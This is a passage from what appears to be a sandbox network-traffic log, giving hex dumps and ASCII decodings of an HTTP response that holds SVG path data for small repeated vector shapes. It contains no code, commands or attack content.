                                                                                                                                                                                                                                                  Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC550INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC566INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC582INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC598INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC614INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC630INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC646INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC662INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                  Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC678INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC694INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                  Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC710INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC726INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC742INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC758INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                  Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC774INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC790INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC806INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
